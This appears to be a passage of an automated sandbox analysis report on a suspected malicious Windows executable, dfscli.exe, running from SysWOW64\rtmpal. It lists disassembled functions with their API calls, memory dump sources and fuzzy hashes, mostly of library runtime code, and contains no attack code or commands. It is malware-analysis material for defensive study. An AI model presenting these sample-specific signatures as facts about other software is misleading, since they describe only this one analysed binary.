                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 004260A6
                                                                  • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00427E2C
                                                                  • MulDiv.KERNEL32(00000000,000009EC,7694E800), ref: 00427E37
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID:
                                                                  • API String ID: 696222070-0
                                                                  • Opcode ID: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction ID: 2e381f7fe369a97062e71ca8c090e36ae9c4614a4b77d937c301da42c517efac
                                                                  • Opcode Fuzzy Hash: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction Fuzzy Hash: E711C231700624AFDB21AF5ADC44C2EBBA9FF88710752042AFA4597360C775AC028F94
                                                                  Function 00411DA5 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                  • FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                  • SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                    • Part of subcall function 004106DA: __lock.LIBCMT ref: 0041071E
                                                                    • Part of subcall function 004106DA: HeapAlloc.KERNEL32(00000008,?,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 0041075C
                                                                  • FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction ID: 2e555c96cbcdb27f1e987eae822a5d52ba16f41a925a0101c91ccab380ceafb0
                                                                  • Opcode Fuzzy Hash: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction Fuzzy Hash: 9CF0FC31B01711DFD7301FB1AC4A6877BA4FB00762B00563AF982E62B0CB74884147E8
                                                                  Function 00429D50 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsFree.KERNEL32(006434D8,?,?,00429DC7,00000000,00000001), ref: 00429D76
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429D84
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00429DC7,00000000,00000001), ref: 00429D8D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00429D94
                                                                  • DeleteCriticalSection.KERNEL32(0043F184,?,?,00429DC7,00000000,00000001), ref: 00429D9E
                                                                    • Part of subcall function 00429BB8: EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                    • Part of subcall function 00429BB8: LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                    • Part of subcall function 00429BB8: LocalFree.KERNEL32(?), ref: 00429C2E
                                                                    • Part of subcall function 00429BB8: TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                  • String ID:
                                                                  • API String ID: 1549993015-0
                                                                  • Opcode ID: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction ID: f3a137cc99f00e13c3aa807b9edadb0f25c424e624a33044372182c2df137c47
                                                                  • Opcode Fuzzy Hash: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction Fuzzy Hash: DFF089313005109BD631AB39BC48A7B76BCAF85711B95066AF816D3351D738DC03576D
                                                                  Function 00412E0F Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00412E2A
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412E36
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412E3E
                                                                  • GetTickCount.KERNEL32 ref: 00412E46
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00412E52
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
                                                                  • Instruction ID: 34e95a29f25a6a58a344066bfba814387cfe7ca9964fe92030387c6fd27a6378
                                                                  • Opcode Fuzzy Hash: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
                                                                  • Instruction Fuzzy Hash: 1BF0AF72D401249BCB209BF5ED8C49BB7F8FB183947860571DC11E7120D6349A518BD8
                                                                  Function 0040B692 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040B697
                                                                  • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040B7BE
                                                                  • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040B9D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Task$AllocFreeH_prolog
                                                                  • String ID:
                                                                  • API String ID: 1522537378-3916222277
                                                                  • Opcode ID: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction ID: ad970cdde69fdafffcc6cb1f39cb6ed57967dbf095fb62cede4e6b66b95c3350
                                                                  • Opcode Fuzzy Hash: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction Fuzzy Hash: 06C13970A00608DFCB24DFA9C884AAEB7B5FF88304F20456EE546E7391DB75A945CF58
                                                                  Function 00408C38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariant
                                                                  • String ID: @$@
                                                                  • API String ID: 1166855276-149943524
                                                                  • Opcode ID: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction ID: ef86999ad6ee6f5cf559b2610e0ac6289f61f51e6328f32c9ffdf30846b8a703
                                                                  • Opcode Fuzzy Hash: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction Fuzzy Hash: 9151B7B1A002199FDB04CFA9C9889EEBBF9FF48314F14456EE506EB250E774A945CF60
                                                                  Function 004289CD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 004289E3
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00428A85
                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 00428A9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                  • String ID:
                                                                  • API String ID: 2596413745-3916222277
                                                                  • Opcode ID: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction ID: 0d6f9ecc143259180f96a21dbcd0bf36dcd83b506795b2bb56614b56ad416b1c
                                                                  • Opcode Fuzzy Hash: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction Fuzzy Hash: 16213E71F002159FEB10CFB9EC85AAE7BB5EB44301F40053BE500EB291DA749545C794
                                                                  Function 004129C5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___initmbctable.LIBCMT ref: 004129D7
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rtmpal\dfscli.exe,00000104,76230A60,00000000,?,?,?,?,0040E931,?,00431A70,00000060), ref: 004129EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName___initmbctable
                                                                  • String ID: C:\Windows\SysWOW64\rtmpal\dfscli.exe$P5`
                                                                  • API String ID: 767393020-246195047
                                                                  • Opcode ID: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction ID: fe4f9612b987f02c86c9f827e6e88cda74fa422bc8271a69fa383c6bdeb5fba6
                                                                  • Opcode Fuzzy Hash: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction Fuzzy Hash: 4A110D72E04104EBC720DBA9ED419DB77A8EB553A0F10017FF905E3290E6B49D45CB98
                                                                  Function 0040BCE2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4C$TC$hC
                                                                  • API String ID: 3519838083-3679543769
                                                                  • Opcode ID: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction ID: 9a0aca956e13d3f40c7eff973b07ae7f3d28aa8e56d2adae96ddab1538bd35f0
                                                                  • Opcode Fuzzy Hash: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction Fuzzy Hash: D831AEB0901B448FD324CF6AC55579AFBE8BFA4308F009A1FD1EA97660C7B86548CF59
                                                                  Function 0041BC0C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 3519838083-1866435925
                                                                  • Opcode ID: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction ID: ade85976828e3d0575b485422f14fa1a4d307c6e90aafc8175f67c845a6277e5
                                                                  • Opcode Fuzzy Hash: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction Fuzzy Hash: B61136719402089AD714EFE1CA92BDDB774EF04308F64902FA54567282EB7D6A85CB8C
                                                                  Function 0041C4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prologIncrefstd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 931760182-3145022300
                                                                  • Opcode ID: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction ID: 133a5817c143689152e06119c2ce411d04637f97aac18120fb756b8f5cb4bf46
                                                                  • Opcode Fuzzy Hash: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction Fuzzy Hash: 0211A3B1E40224A7CB05EBA5CD41AEEB325AF84328F54022FF421A72C1CF3C9A45C799
                                                                  Function 0041C948 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0041C94D
                                                                  • int.LIBCPMT ref: 0041C971
                                                                    • Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1
                                                                  • std::locale::facet::_Incref.LIBCPMT ref: 0041C9C4
                                                                    • Part of subcall function 0040E342: RaiseException.KERNEL32(?,?,?,?,0043F1A0,00000000), ref: 0040E370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 854657108-3145022300
                                                                  • Opcode ID: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction ID: e7bd6d74a278fbe87ccbf35d9b5790177d99eb31d3876a67708471b84b454a11
                                                                  • Opcode Fuzzy Hash: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction Fuzzy Hash: EC1173B2E4011497CF14EBA5D842BEE7334AF44368F50062FF421B72D1CB3C99448798
                                                                  Function 004282DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004282FE
                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 00428315
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0042833F
                                                                    • Part of subcall function 00427FF6: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                  • String ID: %s.dll
                                                                  • API String ID: 4178508759-3668843792
                                                                  • Opcode ID: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction ID: aeac6e575d03eafd3f6c487df0eb32fa97cf7b4fa9cce637b04c964ddecc85eb
                                                                  • Opcode Fuzzy Hash: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction Fuzzy Hash: E101DD72F001189BCF15DBA5EC859DF77BCFB4C344F4408BEA606E3140DAB95A458B55
                                                                  Function 0040BEF2 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$ClearH_prologVariant
                                                                  • String ID:
                                                                  • API String ID: 82050969-0
                                                                  • Opcode ID: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction ID: aff64e16e21245f6878e9bb53209405c6384404d08c4ae572c20ba40f5270c01
                                                                  • Opcode Fuzzy Hash: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction Fuzzy Hash: 1371F271A00602DFCB20DFA5C98486AB3B6FF48308754097EE556E76A1CB39AC41CB58
                                                                  Function 021C21A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021C21F9
                                                                  • SetLastError.KERNEL32(0000007E), ref: 021C223B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHugeLastRead
                                                                  • String ID:
                                                                  • API String ID: 3239643929-0
                                                                  • Opcode ID: 2a18ec49daa347f494c39f1cc86de0c018ef55207888641ba94cd770781fd9b1
                                                                  • Instruction ID: 9c02ebd26d090e265a720c264891e5cfae38a2bd796f7ede724306d551e72878
                                                                  • Opcode Fuzzy Hash: 2a18ec49daa347f494c39f1cc86de0c018ef55207888641ba94cd770781fd9b1
                                                                  • Instruction Fuzzy Hash: 9981BB78A40209DFDB04DF94C894BAEBBB1FF48314F248198E919AB355C734EA91CF90
                                                                  Function 00419D07 Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00419D81
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419D8B
                                                                  • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 00419E54
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419E5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
